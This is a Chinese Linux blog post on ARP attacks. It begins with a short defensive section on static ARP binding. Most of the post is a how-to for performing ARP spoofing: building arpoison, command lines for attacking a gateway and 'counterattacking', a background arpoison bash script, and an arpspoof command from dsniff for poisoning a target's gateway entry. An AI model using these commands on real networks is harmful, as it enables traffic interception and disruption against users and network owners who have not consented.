ubuntu下防御arp攻击和进行ARP攻击

2012-4-8 笑看风云 linux知识

本文介绍如何进行ARP攻击的防御和反击。

1,简单绑定办法

 

#查看网关地址
arp -nv
地址                     类型    硬件地址            标志  Mask            接口
192.168.0.1              ether   c8:3a:35:51:8a:88   C                     eth0
记录: 1	跳过: 0	找到: 1

#绑定方法一
arp -s  192.168.1.1  00:14:78:67:cf:00

 

#绑定方法二
sudo vi /etc/ethers
添加下面这行内容并保存

192.168.1.1 00:14:78:67:cf:00

然后编辑 /etc/init.d/rc.local ,在最后加上

arp -f

2,使用arpison
#arpison是个简单arp工具,可以自定义arp包的发送方式和内容

 

#安装libnet
sudo apt-get install libnet1-dev
 
#下载arpison
wget http://www.arpoison.net/arpoison-0.6.tar.gz
 
#解压并编译arpison
tar zxvf arpoison-0.6.tar.gz
cd arpoison
make
sudo cp arpoison /usr/local/bin

 

#简要命令帮助
Usage: -i -d -s -t -r
-i 网卡接口,比如eth0
-d 目的IP
-s 源IP
-t 目的IP对应的MAC地址
-r 源IP对应的MAC地址

-w 估计是发送间隔

-n 发送次数

#举例(反击就是把源IP改成被攻击者的ip,源ip对应的mac地址填写错误)
arpoison -i wlan0 -d 192.168.1.1 -s 192.168.1.251 -t 00:14:78:67:cf:00 -r 00:1f:3c:6d:a3:c7

攻击网关:

arpoison -i wlan0 -d 192.168.1.251 -d 192.168.1.1 -t ff:ff:ff:ff:ff:ff -r 00:1f:3c:6d:a3:c7

3,arpison使用脚本

 

#/bin/bash
#pw.sh
#网关mac地址
GATEWAY_MAC=00:14:78:67:cf:00
 
#目的mac地址
DEST_MAC=00:14:78:67:cf:00
 
#目的ip地址(网段广播地址)
DEST_IP=192.168.1.1
 
#本地网卡接口
INTERFACE=wlan0
 
#$INTERFACE的mac地址
MY_MAC=00:1f:3c:6d:a3:c7
 
#$INTERFACE的ip地址
MY_IP=192.168.1.251
 
#在本机建立静态ip/mac入口 $DEST_IP--$GATEWAY_MAC
arp -s $DEST_IP $GATEWAY_MAC
 
#发送arp reply ,使$DEST_IP更新$MY_IP的mac地址为$MY_MAC
arpoison -i $INTERFACE -d $DEST_IP -s $MY_IP -t $DEST_MAC -r $MY_MAC 1>/dev/null &

 

#执行脚本
sudo ./pw.sh

本文转自http://www.forzw.com/archives/458

2014年10月22号更新

最近发现了一个新的ARP攻击软件,不需要编译,Ubuntu软件源中有这个软件:那就是dsniff,

安装方法:

sudo apt-get install dsniff
然后这样进行ARP攻击:
arpspoof -i eth0 -t 192.168.217.129 -r 192.168.217.2
其中-t指的是要攻击的目标,-r是要把网关改成哪个ip

标签: 网络 Linux

et_highlighter51

评论:

梦里的畅泳
2014-05-16 09:00
支持博主!

发表评论:

Powered by emlog sitemap